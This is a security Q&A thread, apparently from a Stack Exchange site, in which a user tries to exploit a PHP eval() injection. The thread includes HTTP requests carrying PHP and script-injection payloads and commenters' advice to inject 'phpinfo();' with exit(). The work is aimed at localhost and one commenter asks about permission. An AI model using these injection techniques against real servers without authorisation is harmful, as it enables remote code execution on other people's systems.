# How to abuse eval() in PHP

Tags: web-application, php

I'm trying to bypass a page that has an `eval()` and it works like this:

```
POST /anything.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8


parameter1=aaa&parameter2=asdfas!-->

<?php echo "<p>1234</p>");

?>
```

And the result in the response is:

```
Common, debugging: <!-- print the array method _POST: <pre>Array
(
    [parameter1] => aaa
    [parameter2] => asdfas!-->


<?php echo "<p>11</p>");
?>

)
</pre>-->
```

The result when I render page is:

```
Common, debugging: 11
");?>)-->
```

I have tried many things, such as trying to escape the single and double quotes but I have not been able to get the Bypass. I only get errors when the eval()d' error page is rendered.

For example, if I put in the request:

```
<?php echo 'a';
```

The response is:

```
<br />
<b>Parse error</b>:  syntax error, unexpected 'a' (T_STRING) in <b>/var/www/html/anything.php(10) : eval()'d code</b> on line <b>5</b><br />
 Common, debugging: <!-- print the array method _POST: <pre>Array
(
    [parameter1] => aaa
    [parameter2] => asdfas!-->


<?php echo 'a';

?>

)
</pre>-->
```

Could someone please point me in the direction of bypass? Thank you very much.

**Edited:**

From what I've noticed, every time I put a code like this:

```
<?php echo(1); ?>
```

I become the page like this:

```
<!--?php echo(1); ?-->
```

I have seen in the next part and it works for me to execute an alert in Javascript, but it doesn't work for me to do the Bypass for PHP:

[Exploiting PHP via GET params](https://security.stackexchange.com/questions/36538/exploiting-php-via-get-params)

My request:

```
POST /anything.php HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
Connection: close
Upgrade-Insecure-Requests: 1

parameter1=anything1&parameter2=anything2</pre>."!-->

<!--  --><script>alert('Success');</script><!--  -->
```

Response:

```
HTTP/1.1 200 OK
Date: Sun, 10 Jan 2020 23:26:34 GMT
Server: Apache/2.x.x
X-Powered-By: PHP/5.4
Content-Length: 406
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Parse error</b>:  syntax error, unexpected 'Success' (T_STRING) in <b>/var/www/html/anything.php(13) : eval()'d code</b> on line <b>3</b><br />
Common, debugging: <!-- print the array method _POST: <pre>Array
(
    [parameter1] => anything1
    [parameter2] => anything2</pre>."!-->

<!--  --><script>alert('Success');</script><!--  -->

)
</pre>-->
```

And the alert is successfully executed.

Comment: Hello and welcome. I'm having trouble determining whether your injected content is being executed. Can you include more details about the `eval()` and exactly what input is passed to it?

Comment: Actually, I don't know how the eval() is doing from the backend. Which entry would you like me to try?

Comment: where does the "11" come from? Also, try without the PHP symbols (`<?php`), maybe just try the string `phpinfo()`;

Comment: Sorry, I editted the question and add the part of "11". Without PHP symbols not works, only show the content in the page, I mean, it renders it as html

Comment: don't send anything except the text `phpinfo();`, and it will work, no tags of any sort needed. You are making it confusing by trying to inject HTML and JavaScript instead of focusing on PHP.

Comment: Also I hope this is for a website you have permission to test.

Comment: What makes you think there is an PHP `eval` to exploit? From the requests and responses you have posted, I see no indication, but I may very well be missing something. Also, why are you sending in `<?php`? If you are exploiting an `eval`, there is no need for that.

Comment: Try reading the page response again, there is a eval vuln and @multitr3at3d's payload should work. I would recommend following it with an exit(); to avoid any other syntax errors that could be caused by the injection